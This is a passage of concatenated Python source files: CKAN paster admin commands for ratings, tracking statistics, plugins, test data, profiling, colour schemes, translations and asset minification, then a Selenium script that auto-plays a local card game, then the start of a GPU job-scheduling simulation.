model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
print self.__class__.__doc__
sys.exit(1)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
print self.__class__.__doc__
sys.exit(1)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. See when we last have data for and get data
# from 2 days before then in case new data is available.
# If no date here then use 2011-01-01 as the start date
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(
sql, measure_from=str(measure_from)
).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '%/dataset/'
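        # '%' is the SQL LIKE wildcard, so any site prefix before '/dataset/<name>'
        # matches when package ids are resolved below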
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)='%s';
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;''' % summary_date
engine.execute(sql)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE t.url LIKE %s || p.name)
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class' : item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc' : plugin.__doc__,
'class' : plugin,
'implements' : []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# is this a classmethod if so remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
    create-test-data vocabs - annakarenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by runsnakerun.
Usage:
profile URL
e.g. profile /data/search
The result is saved in profile.data.search
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
    It uses the cProfile module from the Python standard library.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
def profile_url(url):
try:
res = self.app.get(url, status=[200], extra_environ={'REMOTE_USER': 'visitor'})
except paste.fixture.AppError:
print 'App error: ', url.strip()
except KeyboardInterrupt:
raise
except:
import traceback
traceback.print_exc()
print 'Unknown error: ', url.strip()
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
print 'Written profile to: %s' % output_filename
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
color <'HEX'> - uses as base color eg '#ff00ff' must be quoted.
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
        'aliceblue': '#f0f8ff',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
        'indianred': '#cd5c5c',
        'indigo': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
import math
saturation -= math.trunc(saturation)
print hue, saturation
import colorsys
''' Create n related colours '''
colors=[]
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color='#FFFFFF'
colors.append(hex_color)
return colors
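    # Illustrative output (exact values depend on the inputs): create_colors(0.6)
    # returns five '#rrggbb' strings sharing the same hue and getting progressively lighter.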
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
            f.close()
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from pylons import config
self.ckan_path = os.path.join(os.path.dirname(__file__), '..')
i18n_path = os.path.join(self.ckan_path, 'i18n')
self.i18n_path = config.get('ckan.i18n_directory', i18n_path)
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
self.build_js_translations()
else:
print 'command not recognised'
def po2dict(self, po, lang):
'''Convert po object to dictionary data structure (ready for JSON).
This function is from pojson
https://bitbucket.org/obviel/pojson
Copyright (c) 2010, Fanstatic Developers
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the <organization> nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL FANSTATIC DEVELOPERS BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
result = {}
result[''] = {}
result['']['plural-forms'] = po.metadata['Plural-Forms']
result['']['lang'] = lang
result['']['domain'] = 'ckan'
for entry in po:
if entry.obsolete:
continue
# check if used in js file we only include these
occurrences = entry.occurrences
js_use = False
for occurrence in occurrences:
if occurrence[0].endswith('.js'):
js_use = True
continue
if not js_use:
continue
if entry.msgstr:
result[entry.msgid] = [None, entry.msgstr]
elif entry.msgstr_plural:
plural = [entry.msgid_plural]
result[entry.msgid] = plural
ordered_plural = sorted(entry.msgstr_plural.items())
for order, msgstr in ordered_plural:
plural.append(msgstr)
return result
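    # Sketch of the returned structure (example strings are illustrative only):
    #   {'': {'plural-forms': ..., 'lang': 'de', 'domain': 'ckan'},
    #    'Some singular msgid': [None, 'its translation'],
    #    '1 item': ['%d items', '1 Element', '%d Elemente']}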
def build_js_translations(self):
import polib
import simplejson as json
def create_js(source, lang):
print 'Generating', lang
po = polib.pofile(source)
data = self.po2dict(po, lang)
data = json.dumps(data, sort_keys=True,
ensure_ascii=False, indent=2 * ' ')
out_dir = os.path.abspath(os.path.join(self.ckan_path, 'public',
'base', 'i18n'))
out_file = open(os.path.join(out_dir, '%s.js' % lang), 'w')
out_file.write(data.encode('utf-8'))
out_file.close()
for l in os.listdir(self.i18n_path):
if os.path.isdir(os.path.join(self.i18n_path, l)):
f = os.path.join(self.i18n_path, l, 'LC_MESSAGES', 'ckan.po')
create_js(f, l)
print 'Completed generating JavaScript translations'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
        NOTE: This will destroy the current translations for zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False, help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
                    dirs[:] = [d for d in dirs if d not in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
                # Path is neither a file nor a dir, so skip it
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
        minified.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
|
main.py
|
# coding=UTF-8
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import threading
import time
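# Note: the find_element_by_xpath helpers used below are deprecated in Selenium 4
# (and removed in later 4.x releases); on newer versions the equivalent call is
# browser.find_element(By.XPATH, ...) using the By import above.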
def join_game(num):
browser = webdriver.Chrome()
browser.implicitly_wait(8)
browser.get('http://localhost:3000/game/test2')
ready_btn = browser.find_element_by_xpath('//*[@id="root"]/div/div/div/button[2]')
ready_btn.click()
browser.implicitly_wait(8)
calllord_btn = browser.find_element_by_xpath('//*[@id="root"]/div/div[4]/div/button[1]')
calllord_btn.click()
while True:
if browser.find_element_by_xpath('//*[@id="root"]/div/div[5]/p/span').value_of_css_property('color') == "rgba(255, 255, 255, 1)":
browser.find_element_by_xpath('//*[@id="root"]/div/div[5]/img[1]').click()
browser.find_element_by_xpath('//*[@id="root"]/div/div[4]/div/button[2]').click()
else:
browser.find_element_by_xpath('//*[@id="root"]/div/div[4]/div/button[1]').click()
time.sleep(0.3)
if __name__ == "__main__":
threadNum = 3
threads = []
cur = 0
while cur < threadNum:
thread = threading.Thread(target=join_game, name='thread_' + str(cur), args=[cur])
threads.append(thread)
cur+=1
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
PJCT = {} # practical complete time, not applicable for all jobs
PJCT_epoch = {}
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
index = 0
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
qualified_jobs = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
all_job = []
qualified_job = []
